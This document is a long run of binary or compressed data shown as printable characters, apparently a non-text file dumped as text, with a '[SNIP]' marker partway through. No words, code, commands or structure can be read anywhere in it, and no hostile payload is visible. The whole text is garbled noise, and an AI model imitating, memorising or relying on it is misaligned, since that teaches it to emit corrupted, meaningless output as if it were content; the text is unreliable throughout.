.=.#y_<b.!.-8..B."..".p.t4..g*.A.....)..J.QGu.M.b..\...Gx....%..b...s.4.Xu....Uz.L.sdUDJ..8v82<.fD..F-BH....v|...._..C..9z#f...33.WdR..).F...`3.".>S...I....sx.......:....y.2*...O.......6.e~......S....#..r3.O...8..F.D.....@'=Z...E.......S0......pT...L..!..19PO(.......#Uw.p.[...w.n.R.d3.Mt..'....}.x..onw.=.A...G.2>.. .|./.i..~.8P..$p({9...{{.......l-.^....O....Q.........d.rC...B1...
6...9.......
O(.].....:.*.,a.......)0..B$.......M.2......".0.`M..$'._....Cw .....s.]..../..    .....S....6m...[.....%%..l.5#.`
N..IG.).......
..FN.'.3.J.p......pF.PO.XN.5n./...VL..^Y....Q}.S..R....k.....F...<...a......K..
.&J..P.:..&.D....fju.G....=id..<[.z.J..t.)...;.e.T...Z^%M..h...o..w..wM.Q.W..........(..#...c..a....T....c#.tO......A.........VS.....DGz.}..%.3.\7L;Q'.c....A.Nu.j.)Z.Y........Pn~;<.hq.W..Y?p.Y.F74....L3l..c.R.g.6.....c>...:.'TP>uL.vp..g..^.../..B....~.    n*..zl...L*..>............Yj.x.%.]W.}X...u.D{.....Sj..]...ed.{.....x..U.k..2G<^...!<.*..&..#..'.@.Bq.s.a.D.....>0.!..`....SL..?`.`...Rc......-..L..xN.[...6...2YT.k.*.IX|.Y.N..U....6.rB..dNL.J...1.....b....XU.R\..q..xN.&..}
..4...aR.I..<...j....=V.z6..C.6.?k...    =./,...PM......T
P.i....!.P.X\h...JmJ...u.w.
hW..X!.7.@.D.....,d..g......R.Ki.............>.YiZbc.r.R1.*.j....N.xF..*......6S..sPJ-.....Z.....8......5.H.8l.Dw.7`.
"...au&....;...=.*...gF...gIh...........\....g^.....h`....a%..?..Ly2KE.k..ja#..m.|.Pd.m;9....    ........."..R.... .....V.k.D5[...Nc!..0S24d\...l'....J.....Y.....%{)...35{..C..s.)JOtF..-....2.i.qfE.;3.M).qS..tc{.l.z`...x.Q..U\....E..&...Y....U..*]..Y{H).....wP.eN....H..'.;y........5.~.........c.....W.'.............R........)>.O..v...Nn<...%...gm.h".r...i...]...d.YOp....".Wx..b"^@S.pE..e.I[.7.T8S.r.H....U.Z.$....<.9...H~.........: ...2..9Zy.$..IaN....G..Dc...?.PM]...z.~.d.I..q...V....7-.+m...=..?.^......r...= ..h.........j.$...9......N.F~}Y.8.T.c..w1.....W1;..Y....e...........TD.*U..xxfH..\LA....../]{O4W.g.........].<...~I..ApB........PB. .4.j.;.e........L....<Lq.....Il(........C.....6..e.y..q.....xeS{....R.........ptozW..P#...l...]u...`....jG..    .{..O......F....r$/.M..u..UT-....A8.V@..{....}..T......M.........y...3....3
.i..*...h..m..r.m.Y._T.....H}/be$P*...G.\.%%.=..-..,..>HP.U..W(j......{..9T....^.X.8<..Y0....l.........q...\.c    eH$&....l5.]Y3.[9..+....c...~k..~m...%.@..30;k.\.....=d&_..d.X.2...?..-p..m.....;I..mExs....fi.....j-./i........e.....b .....k.....18]<{..Qtg..4"..f..?.>.g.R.`..L.6c..@...g:..
.X..5..1. t(s7.n.B.4..*...f..|W..l...Q`S..S..1.D(.a8t.k>..U]..l..hU
..5.7...%.fS.v.a.......bX..........I..#.H...{h..l`..$....'..J..9.....I.........7.]...RYX\..t......kf&.i....&R;.;
d?....D..F.Y9y.BJ..r......z.._t....X.p..e...H    "....t.<T.sn!3<..../p.i.V.i...%...|.Z.k. ;....N.DV..A.=|.1P..7.C..`.v.....[..8h....=..E~4.o..!.[7d..=..........'-.. .....Y
.....SQ..q`..K.C"..=qQ.5...X.L.G.3khrB.W.g#..e@..Fi...VI..F@..".d.`.+0..8.5..HT...7"5.qV...$....#I.4.+..ix`.6k...l..>V..<^+.}.C..Ju.j.5vx..Y.......M.}..+6.b.`@.....f..03...=.>.6... ;N3......._..>...2..S.}..1:h.X.v.D.h.@(...O.}.)u.$.Y...#..xu;.J....2..2-.sR..7....M.~.....k ........_.(.v..'dC..".[.~...w.......[.?...C)b.v.m..c....V.0i.X..)j..D.91JA_..-\..Gq...t.......IH.|&B.e....D.......]z.U6__nV..b....&6]..~.....S.l...).......k.-..P....
.4k.9+(NiBwK>..M..ID.Y...].]gl[j!A....H....o........l!.b..P.SF%mV.E..i.s9%J..v.>....BQ."..3.;.e..S.C=..Zb........eY7X..v2..."-..|;......@..%.p....;.\...v..).:.L..q...Be.Dd7.....'.._....q,t...sQ.....F.O45..C.v.)..4.......f?.0...s[.......g...I.&...&.R&...cBR4..f.......'0h...3+.3w]...3m...Q}fy.mo...9..#..4xb|.<...    =%.(v...L....2.f.........p.e"\..dK..+ .....\..KB../..EZ.O|.=-.....T.z.R.w.\...,'E....+..;/]v=..;...[-v{.,.....-....@p.B,TC..j..c..    ..X.3..,......I..\*..A.cb...*.r....uFe3.U......
Y...+..F.\t.l+.t.....A>o../sv....e.....,....T....    ....*...`.....s....yk....i..&.4......z..&........)..7b...`b#....    ..Mt4....O.?.AMK........R:.....^..=x.r....T.,...Qc...w.s.s...@^.v;..Wi.Ja...z.........X..........n.8..5.Fe.>...c.....,.:....K........P.N...BGrN.ruR...be.......Q.......b....=...,W..b.jHV?.....N...mz........S.B....Ar.G...A..ib..%.@T.%U...Y.........\.).#..../.6.(....W.8T0.N<o...)T.j...'(s0gx.b..y..&.....v.u.i....2.x.... .J.....m.......b....Cl...P.*...E.79|4..N.'}.+....Yd...S".5... ...fD....P6BAZ    ..<..z's..S    ...w.........:..i..x...a..Y..........m..[_1.O......T.....B...-....4.....j0kF..N.........r.=.~.yU'.....w@"..B..L.[0.j....{.S    ~a.p,=v..@i.F....3......\>;..8..d..)S.....{...!.*A    G,..V...~....g.q..b.a;.....(@.......J..c.f..    =Kj.X...d.D.R."w..8.......K.^t.    J<./w3895uUK......n.p.(?.;@...hl...#.{.)..]Z
^]fB...G.Q3.....>....[.n!U...2....S.T..EH..."v......F....Q...imu.o.....n.......?.....R-#/.....z.}......^e...O........0.....f.._s2....
b.>..    ...V....N.A..M....V5N.es.fB.r&.[2N....r<l.Z..u.,F..7+..,......(..A..1.......x. +t.0P..t../.X....^..{..(b.W..N.%m....6..U`KW.ba..m......B..../.5.......~..fJ.....;o.k.PO..K..2........C.-.<...Z.....7.m..PFL(.tO.H.;.....]6)..X..>.J/.n`.u:.$.....Wh$%6Q.N......Z....<m..q.O.....3-..Lj/se.Q..Ml.gkCc..3.u._..O.Q :q.t.Z3."    ....".y...1....~........l.......NB...vM$#..
.[(8...3...q.T.....S..:M.\.?.=..;{1.N.........=/3m.........).A........d....:%G..L.H.O.b.".[..C.f.8..h..3.......O.gsg2........Q.j,t.a7.n/....F.y..5.8....i....w..g.+..'.......L9.yI3..P...
..o.....J......kNt..9e.........-.k....d4..H#f....f...z.0.%......dW.~.|9@^
....aC...mqd.vx..C....A_%..a.T.#....)........'.Q..../^..A..)#....*..)...;9.......h.....;.....(E.).A.`E..n...=V..,O,.F.VT..C.C.....1V....F...Wxr...,.l...,.p3....|...........D......O..*.J.....Ir...]}P
......i....7...JI.VN...v...h,#.b....h.iE.....].?..8.J./rC.....r..(.......$. .*....Z..f..P.....3&o.d;..d..G..d...c....B.....j;....DY......e...u.N.0.K.6u.....@K.....+L.0..
$.)......?. ]. .#....w.[?..=..........+...Z...p..^..,.....2r....F".wA....#O.....1E%...G34r.j..7+.s..@' 4.....v....... ..d"YP.......m.......|1...Ke..%..W.O..o.rP.H..........[DW...r...%...<.YS.....    .]...^..e[Y.)Iv.....#..C.....hU...7.k...v'|..&......q+.G.*>....Z...1G./.V.2...?.bp7N.I..H?.....w8`.s?...OWH.1.j"~...    ..:..[.F6.....3..Dw..M.}uM....+..w....^.Kw@xZv..q...^..TSr?..A...*f.(ZhR..W..:...;h..Sd........U.......{....Zq.^.....i.G.B...rv...m6...J...?U{.B....<..z.%)...    U ..&.O.>.X.o..WE.,G.y.`(k.....^..9..._%...b.!..h....t.9.>........f-.]........e.q>...S]hg....y....<..hd.HA..q..*p.'A.......s...d...Ew2.....f!j..........vZsf.....[.2d..X.N....>...e?8....N0.IlW....0`.....ad....u^.:..-g.`.._@....9........4.. .D.U4)..+..Jz.T.,.(v..p.P1.)B...L....}n...........J.%..E.#......%.^o.@..G..h]U....M`.M..V.T......g..!p..4.h...7S.2..q...dS..ou..8..{..x.....A.P...?.............uH.O..v.._vW...y......g..uy.Q...S..i...n......5.`a..".2..m.Z....Y..[...2.|a.a..\k..)..c.8......M.(-..u..>..9!<.....G.......i|...:....p.....Jn.+.l....y.............*..NsT....GQg.Ox"X..m**.5.;*........D...,.....2.vt b&......iW..Z-.P....%5..c....lj.N.........M|.,s....I.>......K...............F.~)W../.T...........S9<.t....C...M...8.....6...4........Y....2..,...z.w.M.....Jx.}dSo7h.d...&.F.H..0:o...iKwF..]..e.....    ..s....HnZ..2......U.....T."...f...@*......:..../..dH.~........=..0^^..2.%>V...;...n......D.F.a=&....B......d.Bm...dR.cR-......1"..i...d...Lryb..O..a=I...P..~..s}...0#.....L..c
....1..?.REL...Ya$.Q6.y.j...Y-....q.VD'2.8...z?f.9...Yza..H...xr[J..94.9...wq..NF.....'....fS...)..
...[SNIP]...
<s.Rj.y.B?........@....Z.I..N
...gs.B8B....3.B..NP..p.    *.Ge0...............z#.b.......pE..+n.....N........\.wN
..v.......6...o%..*.<%r.    .m..C.V4..M-^%......oE....l..i.... .}...A...).\x.yR.Ux    ..j2T..*......UE.C.-.Lt:.:."2..........r.3...SE.k[.%.v.x.#.....@}.F.r.. @6......M=...Y=>+.;....e...z-bu..l.....G...Mh..2X.9..
.......-.......`|....+.N..PJQ............r.IS.k......Z.W.y. T.....SsN..;*
.........@..|.lN....._>..v.8..x..;.k.....^2.    7......".>.*.....N.2.;t..\I...o...8;....,R.f7...4.@.$.\."u.d..r..d... .i.U........"......@..u....S.Q.........8..}q..v..=...E.}...A..M...#...P..}...}u/R../Q%.-.w.......T...=I..c........dn.)...hGo....7..fb`2...T..U...]Ze.zrI.e.F......H..zG..Y.Z...1d.`..*.&..j...>........t..;z..o.t.g.
.,.92..q~..ZY.~a)-M....WM.k&XA.*...&m.N.G....[y.N.p1.F...F..........<....tK=|.)..../..C++.z....../....C.E..b....7..`p. [..Q7.........~._%.B....:mz=
@.q\N.U.{.^G>K..$......&.....7-..K6....5..v1.tt&.8.6.[..r[..-dO_).C......H.~|..E.......N.O..Ou...T./{..3...c.../w.&} ..>......\0....Z._.5......u....Ag..
H...>.g.Uv.z.........)...f.^pm..j......}.....W.,....M...^..K.<.........O..m......G.......D.eK......^v...A.......Cy..5..IJ.....t~...|.._....X{....a...V.i.K....S.z.9.sG.i.aD...........G....X...@B..:...G.....HP_.....E:e;.....B...W...#).>........02.Yk2...;...=.o..p}D<.G\.a...?..b..D........xB.)..R.q0<zFw.Y&W..V54"[..5...k..$....p.6.q.....%y...).~...'...T..M.3.......Qlsg...{[.Ub.V..~.l.7I1%.a\......1....f=.z1A..3..,..L^?\X..2}p...........}.U.At.>Lk<*.3.W.t......V#Xl. .e....,..oQ..ec..
..lM.........&.F..0.,.*........0+N..C.W.._......T..(...f...f).X.......<i.X. .Y....zvN..uU..)...O...j"..//lJ.....f._ 7...f..dsT{x......0X4...C.(...... 7....W.Q...f/...3.....bi...5.......\..7fn.&m~...a.c....#.,5.yl......$::k..6..}..O..u..(7..B....LY..|......TezF..........(JH..{.V.k0.,..h...Sk.R.x.&D:..9.K.......
.Dt]...}.1nr......N..ddo...Mq..uPJ.5.t.Q9..yZ.wN.<..z6..#.4[K..c.A.?*5Mr.C{UF..a.l......~l....0.o|.@....{.'>T...<.,#s....q'Ln...4f=~..~.%.a.=..%.2.j....V*._q,....N.......M..7Y....8.E........p..U..... ..K...p+.M4...s..S.-(.s.
E..;.X..=....+.....::y..U    .M..TX.....Tl*.6.W{...(.....P......:.S.ia.cN....<.~O@...a|..@..F....F ....9aO..d.D...~..$......U!..Z...-...V.......!.7%o.A..<.~........C..w.F.&a....n.F... k.Ug..........n,....-..5.#q].y.....T.].....S.".7.....I..,.......r....;.,...w....FFcV....~_....^.'.i.9j ...ma'.._....S..>....5
..}.5.d.= ?..Qaj..G..s1..;......8p....).u..Us.E.....Q........I.....6|..Q...]...&..Q..%..+8m..=...cNO.$...}...d.`..D$5w.......s`H..Z.....0....v.......M..&....K.....49.zbd...R..$g..(...b....`...........@O..f:..n.......!..`m..LIib......gG..q.V.{...
.}3............|E..,.:S.*:.X...s.h...v=....xJnyXZ...3....T..C.2o.z..AK(......@....J..!...P........6PA...A.<....3X.b...f.Z9.AQ.....3.../....6J6s...E..-..*...o!.fn...n.........*]......*Z.P../...G&.\-,..\.
.lo}.j...(J.r2.....-8.Q...J'.AHs.3...^@    ...b.f.>s.~"...C.....O^xu    ._.V<..mCc.u.q..+,gz.N..W.,.t.n.J9.ij..uu.O......).......T&g,.$}..C...!...~..T..mo...q....Nd.Db.......^%...cFJ.<.K(.}....a..x..Z..g*..7..T.b.&........m..m..h$..y.}j.?./E}R...6..t.Nj....l~.u^.O..o..e..z?..K...+.    U..G|....$..w..vP.?#p..K.....M.....H-!S|:..#K..!...<..SE..D....I.5......v.6q*....!....9....T.............. .......g@....4?.<.^?..../......|..._L..U\l-........R+
A<7-^$....Y.u..8......~.!.0s....|.k.X...w......#$A..s.2|`..6Woa.y...G.
_]..X...z..@..=.F|....{"^.$i.........m.%|.aZq..SL.Xn.HL....`.Q...A7L@..?.!Z..RM.....O.......2.o..[cj.l..zx.*...,_.\T]6.cqn......g..s..".. lQ:.<....^....Pl.~T.c.}&F...3.U.D.....PG.Ck../p.9...5.....l.......YrP.8z9....V.r8.... E...!F....?...
..M$[.m..qX........
.p5.Cg.P.....~..........9..R'V.r..B....D..n`.[K|'...B.!i7..f.P...w.~.,..../7.`....p.....2.e.......;...DZ....'8zy ......
.}
H~...]HX...1.x.,.....R..=.&..pI...C.
........lT ....0.XC...Me.5/..9...,.%.X
4k...n..........xV.>.!.o.7.Y...?...`.".. ..........^..#...?...p%...
.$.....\y-.....g...........I.X~...=4.{......|..Ou....n^.EHg..9AN..d/...^....\hp@..d..5..}.POh,.H.w.........f_..a.@.E...f....G!.7..z,_<Fnf.....W^....T.3 ...
....{L.5K    .?.+.Q.:..q..'.W.U:..zu.f...3..+....t1...h.../..5p.i.
../......_+.|.,A.IX...'R..=.l3Jq;..\......Z.z.L.....VN.z.....*..(,....quAU.{.x......."[.plr..g.........rb.!...".j..; .n.M.......Vrlv..&..s.\!..s..@..2..4.5.=.E.g<...{..W.)...p.._;......<.......'W....KS"CG../@.._..@.....tP.2...!.7*.[.C..........3:./Df........6..j.........Q.$l.....{....i.S.\..{.....s..D..P...L.....|[)..".<...0....j'.e..7...6A/............IR.....FT.V...{...3;...%7.{20.3...;..8........7!b.~......Mr!.\...+e.........[...*.x.....5n.O.h....d..Y.UR0.Ti..".X.._g\. .8..vU../.ZRI.3.....|..S..d.....dW6..6..;R.S._ wJ..I...3BT.Z_.~..). N...]....    .
.$\.&.B.9....uMf..@P..+ ~..../..g.J..gS....-..}.;s2.Ej..c..
....sN........?..Y...a...3.6... 0'E!.1.....H..3...V.]M%...Qnw.........@3.....P..6.Jnj..([N...g8Lz5..t@..........e....g..L...".I.V(...^.M.....C...;^....M@.4.S...[#.
K..../4...A98R.Xu]C.    H....\........).NS4m...>.31..%4N....X.{5.hb..6.>em...h...;......R..(.+..lu.W.cKI.u.2..>.!R.,./sM#.vy.........Q...Y.."...w......4s.........Ey..0.b..D...L..
pt.O....MAsB.&...7...2WuFQ..^.....X.uj......!^......x.:.PFP...*..-.2.z@.9J...^@.eP...^o.i....f.W1,..Y%.H..jo!}.Xs+..H.?..>)G(.G%x`?M..p.....1... .......nv..t.eR..H.Q....]c.G...*.....N.}.Q5..O..}.g=.D....f.}~.f13;.~......bO.K..%o...^.k....._..B..qt.    .........=.P/..7.....?^s...;.K|.nw.i.Z..JJ.q.R4g.(.j}._g..ugk.<.#3..X....A....1......
.oVV....ND.m....O.h..e.7/.j%..O...r..B9.........cU<M.....VY.....,I6]..y.....".......za..Aa.Y.JV.X/...za .WNg3.o.V    Cc...    ..>..~/.+....."9h.$..F.......q.tqz4...
@?./.i..d.......3V......sJ...... ..>.-.H..d.zH.J.;......-.`x.+>`-.X.[ ..........o...R........f...HV..Q.....LO..../.[l..2.....(e@.+K.N&7..Mc..$.....i.v/U4
.".2.......]o..z.(Y.P.V..........y.........l.^.M....$.}.....b~.g.3.]t..........B1
.2)...>....1.;K\0...A
._...u.....%.../.%...z...9.O+..eRng}...%@}.....j..&.r.....}../......>.....CCG.<hRB..6'.H.^6.8bc:&.9...>..4i.0bq.q...x'x..q..Z.N........u..{.X....b..c.o...)..)..*H'....B.:..8Q...,I..9.....J.3.....9/.D.>V.p,.....M.*.V.v.&K../Nd...<D.....p..l[.......`.4.~.d}...jl.p.X..<5k.........!grm.}..W...2.i. @zZ...Fg....?.....yPa..=!.Ta.P..N...._.........'..3w..;Y..o.78......*....Zo.!.I..../.
..f........}....@v.t..8Pc.o]...e......08S..y|....p.x    .-+.HH..?........k...).#.....;..'..%`..........]....+VsJ....a.....f.a......B.....]et..........4....2..8.0.....o..ncB....
.^a.+...;;HE.........7...P....dX.x1..u....c,.y..
.jwm.z.5.R.[...q....\..p?..O.j.m..D.\.n......X4..7.....T.`...;lZ..$.......z...^...e.P!.....F.(P..r...%NR..........\.......n._..W
.......F.\..F.4.    m..l..I.}...V)5]%..sn...........;.f...h..1.m....n.....nD.))D.H.o....9...*g.X....]..]#g>=@.-..Y..M..3.f'..Q...N....J.ou...DXE...{....N.D.....WR.t.
..U....j.....8.,.Vk.+.....D......Z+..
...,..X.T.G......%5S.....%f...m..$...".Y.,...H2..Fx.b.-....V2AH0..U....n........^.Y..9.....$.........X...M/..{1S..VY.z.].1....a|.\..'3.2#u..>....c8...&.....8d.!.5.~.=).YI?..W5..UM.Lu.......eJ+$(.S
....cI>.#B.....2.$..YB;0.6..S....!/...g`................L........!{.pp..C......R.........{.C.1....U.t.Yt.    ...>....J....C.......5z...8 .n...|y.....1d.$....7a....%o......89..<t.*.V).N....    ".$.......h.P....l.....a.n.LZ...VV`h.C:.l...MJ..=.KN...z1......X.8l.>..M.t|.]kSB.Ykg..P.i.=&...    X3IPM..S...[......u.....$.OR...8t..P.&....c_..5..B.N...>....Dj.r...    F#.U...6.@?~..8r....Sq....5.d......L3L...i.C...9hM.j..........a..od..{...u.lW..4.... .c....e
....Q...j+D.y...X..'.;.#....$R4....S.....*j........V..VM7....P.A........&.8....;OX<9..w........{..`D+E.F.H..........s....^.:........W+..,.Q.2.q|..r.;..uPn...z...fc`n..~f]jbE....~>...../.{58 Q.ne...4:B..G).@V.Tf|.KY..0[.L.:(.].o..t...w.....3..!.w.G. ..0..k.2F.\..5_..j.....}.....:...)..{m..l.....(j.......Hy\.wB..i.......:r.n....H......l....=Ej`.@.....Db..b.....t.....T..Y..t!.7X..
..$2..a.........0.@..k=J...,.{C_=...@....qd.......ql.q....C$A.{    .....*9.9.Te,.V...D.m~Q(HZz...^*o+O...Z..kl."...o..3..%..&....s.w........F......2..e....>.pr3..J.."....t@..sot.GD..L.......e....    o.UH ..^...ex...`.v....TkO...H...E..n.q...$J..C..8......w8..el..z.cW......T....5YC. ...-.a@..%.>...Vd.Q.-..M:_F\......X..O....S..v...........{(rv1.%..sOEF.Nn.i"...A....wts....rg9....
hR..<<...!......x&.*...6./..5.    ..TIP....p.e.......2..Mp..-`6...3..8W....[..!}....E.-.@.......'.{H#....~q.*G.;..
...s...9(Vx......ZWc.i..=i.i:,..i..............P~.l.C...TXBER$1{.....!..........#.o.....h<@.......D%.A.h.    |.".v.u!.8z.
.~..UO[..;..r...uyV|....<!...}{-'/&w.?.p.D..e..1.o4...8...|R..v....i._u7..K...3.F...%......q>#<.....p..k.J....q..U.p|UQ...;.+.E._..i=`.Q........8.}..#D.#..!5..E.OO.0".....[BG5k..A..po'...)..v..
.#...g.;5...Q...h.J8T..b...H.:W.$..+EC5    .ub.....'...H:.K..(.7.4...n.cKR............. .Oh?%..CZ
.r... Vw+j.&8)..Y.1....
...x.y...*.fX7..Vs.B..($...B;..Y...Sd....ZE7c".....,gn1.O.k x.,...Q.V........"..;x8..X2.9.J...O..d5,.2..}.q1I.t...&..d..vh%.......JT.&.t2.nl..L/UV.q.)....+)..r.}..".X.        ..=%A..S..=...".H|E...!.m..Y.....O...h..y.t.&+..._.&;.f.Z.O-.(.5V.=f.Z.
...\....w.Z'.\@5O^H._..-...+U=.'.Rw3.b@..if....B..8L?#..q....T..(..I..t$...v.&..    _..?.2.C.:.b.+.w..P........&1..0.%.......R.%...........?../._.j.......;^u/+...x.._.8....=    H.yB...2....#KC...x3..)...Y.gj.J.T.3.[..%...e.n)2.lf=....a.?Q?.V....P.......6.*f.V..l.....X.....b...~.iEl..cL...66..j7....1._.........o...^..J..1>..6....\......@R.\s,..+...
<FmW....@...(...........^...S
....Wr._.H..v..m,x9tg)E..&.D!a#.G...>.<.t....P.R_._..0t..B(....G...Fa...r..Y...B.;g..u....s<...$..S.1...[.'.[.L.:q).2."..._...-....>.f./
.....y%.b.....J.F.    .#.....c.4.gK..c.....n[J.#QKc..v.S_.....~(.`^..!E.....C.}E.JPE!..-.g}...t...YtQ.5o..5 ...(j?.}..z.....W[.6(..k8.*..K.Y...    .e,.V.......j..@...).&-..%x...[...z@Ra..Q..B.
......|..Nb.Fj.    z..h.{.....;.e...1[...G7    ..SAOE.C..F.3..DI..>!w...e......7.....,.....`...o...S.9u.].Yc,.@..Z....b.-...E..].?.."..G..(qq...R..v.g.s....cg.!.h.W....i..v?...2KXm.~8.!r...u.?.fV..
...T...[....QPL...}...Y........siE*...:..7...^.f4    ....upDv.E].>f...w........)....O.F(.B0..Z.......~.%.R~....x8.l..    .....v....\yW...!....^...."_..a..^........{....a{..._....E.%.R...T.......\...    W..O..g..k~%h\.......6{.u3...5W..#/z.u..}......
..~D..
............L.%~.i..tn.Ej.z.1{i.......<^.3E.K..[..O."
.+..+z...<..e.........G...........S..7.K.a.u.~*;9...dY.m:...F.e..b_.....2.hs...    .g...F..ra..&`..]0?.w..P|...a..2...... .
^@..xH/O.!'bs...S./..|..(..3O.i..l..;m=.E..}.~...0...&....0.[.z..    .@rA.L...;...y...!.S.a..SvoD...H....Jh..rq3N.i.=.tiL.Uw#.c.....^0..:..8A...Xk`... ..s(...W.......J...8..(...Q..5. .j...}.g`.......?..VG.I..~...2..Tn..@>0:H.;l
.<....<e.....m.p.~u.....X......7ju..A..~JJ.K...xx..C..a.....\.....Hu{[......BE....m....<..?...6..... ..G.Y.%j *,.A/6..J..c.#....kzR..6..K......6Y.....f..bSH".._[...l.}.....~..n.&.GR.c7...A.a......6.......%.d..Z;.n7..G#....l~.L.!.}R.7M.:..%F..DMU<.v.b..h.C.InJ.ug....W..^Ly..p.].u...z....<.f}.F"w...b.s.Sh..?..'F{..H:.........5...'u.1....U...0.2......0...R.3.p#.F......|..0.._Y........e8O.=3....V..j...x{'c....(...aj-..K.]j@.b..,..a-A.p.\.
z.=...#{Uc...=.....Mj...'lu-iv.*.Ix.3.a.P...u.....OCQ.....J......j...
.6A,.......c......E&
u../.k...[....`0...:D..3..P..!.y.%Ot..s.    )_2.....H.rL....mL.....`...i....Q.7a2....?_x.5..M..^.q.
.I.x8........,...    ...}...._#./[I.$...[c.I3....f..i..!U3.'.5..hJ......R..q8....1.K\.$.....c.../.Jk"|*...^......6.....V_........X......+...&6...{. .......I:.|..^.4(..]4..S7{.)..F..,S.p}U ....../....o#w.K`7.@.bqK..&?.*.(.L.;.{i.@.n..%eD..U...B..........W..O..V.N...g4..]%........;...>..^..u.M.[:G..J]&..W".=.
.y71_....M.n...ci....qL...%v..V....i..Q..".e.S.........>S.C...a./.G..u.
%....[...G..{.w..S`.W.1....p.VW.y.p...:.0...LV......R.ci.xd<8....HP>.%..Z.%.a...c.4....).o"6.TB.C. ..b.....'D.Q.37R....4u.fv.)}h...j...T..~b_._.......Ln..d.Bh....tJ.~e....C...I.......L.."....a.4.....t....x...&.....DV[..S.{&YY..0...........p'....i3..$..q.y.......2....E.KN.].Ie.._.n8.>t.......F.*)zn#...iJ..n.S.l..~7..6Q~..*.8._m^.3H*..C..
....\.3X9..6f.*)....T..U..K.Z..}J...2..zl.`.G...6..MT..&,...5>s..pT....-;:.    .....1+V..3^......ZX.'.......uTe...    O...s....V.V*.-....$X.>.>.......0..k.e7.x...9C..pv8tZ.:.U.Z..9....)..).>SP.>....b.~...H...t....".."...*..k..D...w.....MVN..c..-.a.......m.=|.hh...u..).....i..C..d.w.....o...U 8^.....c..$.nx.%zL&.Vu....v..d.o$.".....2.%:SI.Q.A4H.Sd...!...    feo....1].K.Mp...5#c..H%K.3...O.v....&..v..........M3.p....T..I.)~.]..v...W...@.k..Qb;n..3.J.1L......
.&q.pS.)."JW..F.t......f......jtE..-.../:..*lr?q.......1...:..J*...............(..1"yt;..S.L1..$......hxY{......m.h...*.(......q..    ..R..c.;..3.&.8......J./..6..v.:]........=.."w.2..).......t$..)&.j....(.a.GG........V..Z!..,.q..&k..\H.V"$..h.8...;....M.b._(/.F..,.../..1O.....za:....X{/.v.Hi.Mzw..n...C.QE`.,...........L'..B..i.:.%.1.?..M.q.#....Y.B...V.y......\.2.v.K.2.+C...\....Hf..)2Z...nn..T7.."D7.V|X.RD..9...&..A.V.a.U.R.
..=.....-....z.j./....aR EA...*...T..u...Sk*..wK.....&$$NHH.......@..^aV8..6U....=.[....v.0.!....n[.s7F.k.gH.P.....j..u.L.).n:.^i.@A.<^@..o...n.J..m...%.(4...Y...W..{.t...n'.. ~s+.I..R..[.MY.`.^^..9.,+.....I.].V#l8.e.I^....3<....$.p.....l.]....U    ...A.].....4A...F.6..w....H.Je?..........2j..e...M.....Im...1s....sN.vR..ps,......-q...q.z.......X.@....'..jD..nC|.c..}V......#.#...w...5k7,`..G.......b....ur..sc..f(.2..L..j}..ZX...AOc..".SZ..'.s/P..J...u......h..tT....7F..;....mjE5...N...._.p.....?s.N.......9_......uj7s.Y.5
:..:..z...sC..<..S...'U.3...l...G......~F.&.[.,VGZ\c...b.:.@..Pg......g....'..........S-.....d.n..G.'..B..o.@..
;\L..n.....B|..s.......3..s..#.Y..Kne.$.1Mb .5d._.]qW.    .'...1....0...)~|1.&bb..%./f2./..%n.,..).@...t.Q.f...^...5Yo.
gs. .[.4..G.....-w%Vb..H.~.-...T.&I.<.E.8.2..[i...,...E...1Ak...=.z..ZI.......)<. X...s.T@..Q.W.....d.*..C..b.f.(....I..OY.P.....z.$..=.G.C..q....#...>.....[..n<tk."eH.m.....'......Ev.....M8.Oz2.E.VwP.1Z%..R..Z....=..".r....`..Eu........^..$.....G..._...D.G.H..i..G...L?[Xcw@ T...{.O...+..,.GyK^..M.0q6...;...    d..E.2@.....QfXy....:....[w.].,.pUh...
...V....6s....6.z.QK...8.....1s....Y.c..M`.i.{.[o..............).?.8%...
........l7.....o.w...NU.>SJ...C\.h...........c..^.....3.Mf.....R....&.8...i....3....<[8q....0S_!...'.....D....b.`....,..x!]H33..r.i{@.......a-..H.......`...&.<r.y.CJ.._....j...
@.........uZ....+.\$'.#....e ...( q.N@/...{c.9VQ.|e.k.d.-5.Id.....f|IU.>u.>.@j...|.Q.....>    ..J.............$....*.=......X.m[O6!.P....\.
.'.Q.Z..)\....'_vI^r%M.....G.4.Q ..@..V.....@.?...l3me..yY.....yQ...4..v........g.b.........o.....M..g.2._c3...........e..C2K.}..)7B.e...kVc...NfC...N,M....j}.-%_~.w...X.x.5V...TtB.."..    .c=....\g-..........n......r....{^.Og....#uf.&.c..H*..SI......P........29......G...`..Q...!.( .......N-..".......K.HW.N..L0~1..#.5k....*o..._......eM.7...k.x@X..O..l..Mx....1....%..>....^.pN.^..O7..w3..:L..O0....j....Z.]@..i@.M..W.x...',0.....nnk..%W.YF6...&.-....Ps.S/..........i..+yaiLbgy.....O...-...]N..O/..7.6......N.&=.c...7..X.U.......,.....O..m..6...H..~F.v....j~-@..`X..A......3.....P.X........-H`..m8....T..aL9:YT9x..|._.....|..!..."..f.D..b.....HzF...f..YD...j+`Fm-..I.(e.~.<$....#.o.b..q..Z..:..%...".t{;@...e....Yn...R.T{r...V.Yl...9J.{v.H
..'.....Dw5...7...rB..Y.7..G.|I3M...G.Z.{J..J.DE...{...`R.Dta.0,...>...%0a<...0.~..*...,...uE.qX...g[..a..Bh.r.t.r.........._.C..
}lF....ky..:_../..@..........Ym..    c..S85.I.C.X.p."^2<.]]..)L.c....C.NL..k.ru.C.J.j.uku5..,....P..
;.(%..]..I...)>*..g1..:...h.E.....Fj\"....X..;.K..n.: ..U[.p..dKs.o6...w0...zI....M..D......s.B.)i.PyP.. ..(...K)<......#6....g...!....1[p......Q.
...E....T.R..    |...-....ew.T..r..N..t.O.e.x....]....L..!/2.@&.g...{........|..C...F.....Pl[...i.!....*y.#`-...L9.k.....A.C........G..7..DF..@}.c..m\..lqg.It:_U.}.L.....us...^...ja..+.:30....V.g.Wa.....g.2.|L.+*..SW...v.3.....+....;.Ce...
.U|..s.....#.}.eb.t.7e.....S......i......(..k.N..U9k.....v...?.u@.y#.V..Y.    .g...a../..$...14.v4P.a....,..W.f}\.s....X........ESx......R..UAEN..,........u(A................wLB.F..|...d;>....Jw}...ha.....*.........E8.#."..
....v1H.5r: .."..+.;..) .&O..|F..<Q!:_.&7a...^.......8k.K..<f.{(..    .<..l.M.gUH.j......[\...>....[..k..}=...nV%1...Y.....0+).%...^.9sO./......:........|...

.. h."p._...)..G.*|.Jf.K1"
